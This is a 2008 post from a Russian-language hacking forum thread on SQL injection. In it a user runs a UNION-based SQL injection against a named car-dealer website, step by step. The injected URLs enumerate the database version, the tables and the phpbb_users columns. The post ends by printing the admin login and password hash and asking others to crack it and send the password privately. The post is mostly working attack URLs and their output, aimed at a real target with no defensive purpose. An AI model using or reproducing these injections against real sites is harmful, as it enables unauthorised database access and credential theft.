ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 11.07.2008, 16:00
Мистерео
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830

Репутация: 94
По умолчанию
блин что вы курите...
Вот смотрим версию
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+version(),2,3/*
Ага версия пятая смотрим таблицы
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+table_name,2,3+from+information_schema.tables+limit+1,1/*
находим таблицы вот актуальные
Код:
Action
Akssesuar
Colors
Complekt
Foto
Foto_old
Marks
Menu
Models
Old_avto
People
Texts
Vacancy
accessories
all_details
details
documentation
files
files_up
forum
graphic_people
inner
news
news_details
дальше идут таблицы форума (на движке phpbb)
среди них есть таблица phpbb_users
роем на колонки
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+column_name,2,3+from+information_schema.columns+where+table_name=0x70687062625f7573657273+limit+1,1/*
Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users
находим нужные нам колонки username и user_password и составляем запрос
Код:
http://www.adams-motors.ru/new.php?id=-2+union+select+concat_ws(0x3a,username,user_password),2,3+from+phpbb_users+limit+1,1/*
Получаем логин админа и зашифрованый пароль а именно
admin:178f6c2365ac7511b4bf37c8e89cc678

кто расшифрует скиньте пасс в личку плиз.

Вот и все
Последний раз редактировалось Мистерео; 11.07.2008 в 16:03..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ